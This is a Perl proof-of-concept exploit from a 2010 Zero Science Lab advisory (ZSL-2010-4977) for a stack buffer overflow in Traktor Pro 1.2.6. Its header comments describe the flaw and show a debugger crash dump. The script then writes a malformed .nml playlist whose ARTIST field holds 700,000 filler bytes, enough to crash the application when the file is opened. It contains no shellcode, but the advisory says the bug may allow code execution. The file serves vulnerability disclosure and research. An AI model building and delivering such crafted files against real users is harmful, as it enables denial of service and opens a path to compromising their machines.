#!/usr/local/bin/perl
#
#
# Native Instruments Traktor Pro 1.2.6 Stack-based Buffer Overflow Vulnerability
#
#
# Vendor: Native Instruments GmbH
# Product web page: http://www.native-instruments.com
# Affected version: 1.2.6.8491 (Standalone)
#
# Summary: TRAKTOR PRO is the new benchmark in DJ software. Mix digital files
# on four decks, using the high-quality internal mixer or external hardware,
# and the best effects suite around. Fully primed for professional use, TRAKTOR
# PRO redefines the art of DJing.
#
# Desc: Traktor Pro suffers from a stack buffer overflow vulnerability when
# parsing playlist files (.nml) resulting in a crash. The user input is not
# properly sanitized which may give the attackers the possibility for an
# arbitrary code execution on the affected system. Failure of exploitation
# may result in a denial of service.
#
# Tested on: Microsoft Windows XP Professional SP3 (English)
#
#
# -------------------------------------------------------------------
#
# (4418.4608): Stack overflow - code c00000fd (first/second chance not available)
# eax=14250000 ebx=001cc168 ecx=00000007 edx=7c90e514 esi=001cc140 edi=001cc198
# eip=7c90e514 esp=0ff5e4e4 ebp=0ff5e4f4 iopl=0         nv up ei pl zr na pe nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
# *** ERROR: Symbol file could not be found.  Defaulted to export symbols for ntdll.dll - 
# ntdll!KiFastSystemCallRet:
# 7c90e514 c3              ret
#
# -------------------------------------------------------------------
#
#
# Vulnerability discovered by: Gjoko 'LiquidWorm' Krstic
# liquidworm gmail com
#
# Zero Science Lab - http://www.zeroscience.mk
#
# Advisory ID: ZSL-2010-4977
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4977.php
#
# 09.11.2010
#


use strict;

print qq{

-------------------------------------------------------------------------
|                                                                       |
|         Native Instruments Traktor 1.2.6 Stack Overflow PoC           |
|                                                                       |
|                 Copyleft (c) 2010, Zero Science Lab                   |
|                                                                       |
-------------------------------------------------------------------------
	};

my $bof = "\x41" x 700000;

my $start = '<?xml version="1.0" encoding="UTF-8" standalone="no" ?>
<NML VERSION="14"><HEAD COMPANY="www.native-instruments.com" PROGRAM="Traktor - Native Instruments"></HEAD>
<MUSICFOLDERS></MUSICFOLDERS>
<COLLECTION ENTRIES="2"><ENTRY MODIFIED_DATE="2008/11/18" MODIFIED_TIME="46610" AUDIO_ID="AGYAAjFQQiQFFCFAQSMVBCIwUDISBBXf/rhv/6/609/979uF//v/nD3/zf24X/+v+tPf/N/bhf/6/61Z/839uG//r/rE3/zf24b/+v+tTf/t/ahv/6/6xN/939uF//r/rUn/3f25b+/P+dTf79/Llv79/51M//38qV//3/nU3//vy5b+/v+dTf79/Llv/8/51N//39qW//3/rUz//f2pX/+/+tTP/9/blv/8/61M//782W/vv/nUz+/fy5b9/v+dTP78/alf/9/51M/v38uW/v7/rUz+/fypX//P+cS/7s/qlP/6/61L/9z+qU//r/nEv/y/6WP/x/94Ru7CEAAAAA==" TITLE="Demo 1" ARTIST="Paulseq"><LOCATION DIR="/:" FILE="Demo 1.mp3" VOLUME=""></LOCATION>
<INFO BITRATE="193000" COVERARTID="063\5RHVNTDZ5QGUQCJSQT2SAIRKVFNA" PLAYCOUNT="6" PLAYTIME="101" RANKING="0" IMPORT_DATE="2008/11/18" LAST_PLAYED="2008/11/5" FLAGS="2" FILESIZE="2488"></INFO>
<TEMPO BPM="126.200249" BPM_QUALITY="100"></TEMPO>
<LOUDNESS PEAK_DB="-0.766197324" PERCEIVED_DB="0.94946605"></LOUDNESS>
<CUE_V2 NAME="AutoGrid" DISPL_ORDER="0" TYPE="4" START="671.08913429252357" LEN="0" REPEATS="-1" HOTCUE="0"></CUE_V2>
<CUE_V2 NAME="n.n." DISPL_ORDER="0" TYPE="5" START="66299.022459106593" LEN="1901.7395166612771" REPEATS="-1" HOTCUE="1"></CUE_V2>
</ENTRY>
<ENTRY MODIFIED_DATE="2008/9/9" MODIFIED_TIME="56472" AUDIO_ID="AE0AAAbzv4bJPNhuR+po5a51uDzHXUbaeMKuhYdnVl+H3Inln6bba9hvhtt55o62yWvpbnjreseflslr2G5n+4rWnobaa9duZ/tpxZ+12WzIf3fq37Wepuhs2X1n22vGnpXXa7d+Z/t71q2m+my3fWj6a8autth+6I536mu3rYXXfciPaPptxnRk+K63jWr7bbjeluietp1r+Vy3zqbmnsmve/ltp92m14/HnHvabbjehueep6x762yY7Zf4lVWcbOpup9yWx6+3z3vpXJjbh9evprx82W6o3If3r6a7fPpdiOyI6K+lzHzZXYfth+avptyIZ01BAAAAAAAAAAAAAA==" TITLE="Demo 2" ';

my $traktor = "ARTIST=\"$bof\">";

my $end = '<LOCATION DIR="/:" FILE="Demo 2.mp3" VOLUME=""></LOCATION>
<INFO BITRATE="194000" COVERARTID="006\GEUNGXABSHRWRDW2UGHKAKQUYRVD" PLAYCOUNT="6" PLAYTIME="76" RANKING="0" IMPORT_DATE="2008/9/9" FILESIZE="1903"></INFO>
<TEMPO BPM="119" BPM_QUALITY="100"></TEMPO>
<LOUDNESS PEAK_DB="-0.257283062" PERCEIVED_DB="3.40946603"></LOUDNESS>
<CUE_V2 NAME="AutoGrid" DISPL_ORDER="0" TYPE="4" START="797.66281512605042" LEN="0" REPEATS="-1" HOTCUE="2"></CUE_V2>
<CUE_V2 NAME="Beginning" DISPL_ORDER="0" TYPE="0" START="797.66281512605042" LEN="0" REPEATS="-1" HOTCUE="0"></CUE_V2>
<CUE_V2 NAME="Loop1" DISPL_ORDER="0" TYPE="5" START="41133.797268907569" LEN="2016.8067226890755" REPEATS="-1" HOTCUE="1"></CUE_V2>
</ENTRY>
</COLLECTION>
<PLAYLISTS><NODE TYPE="FOLDER" NAME="$ROOT"><SUBNODES COUNT="3"><NODE TYPE="PLAYLIST" NAME="Demo Tracks"><PLAYLIST ENTRIES="2" TYPE="LIST"><ENTRY><PRIMARYKEY TYPE="TRACK" KEY="/:Demo 2.mp3"></PRIMARYKEY>
</ENTRY>
<ENTRY><PRIMARYKEY TYPE="TRACK" KEY="/:Demo 1.mp3"></PRIMARYKEY>
</ENTRY>
</PLAYLIST>
</NODE>
<NODE TYPE="PLAYLIST" NAME="Preparation"><PLAYLIST ENTRIES="0" TYPE="LIST"></PLAYLIST>
</NODE>
<NODE TYPE="PLAYLIST" NAME="_RECORDINGS"><PLAYLIST ENTRIES="0" TYPE="LIST"></PLAYLIST>
</NODE>
</SUBNODES>
</NODE>
</PLAYLISTS>
</NML>';

my $file = "PoC.nml";
print "\n\n[*] Creating $file playlist file...\n";
open nml, ">./$file" || die "\nCan't open $file: $!";
print nml $start.$traktor.$end;
print "\n[.] File successfully buffered!\n\n";
close nml;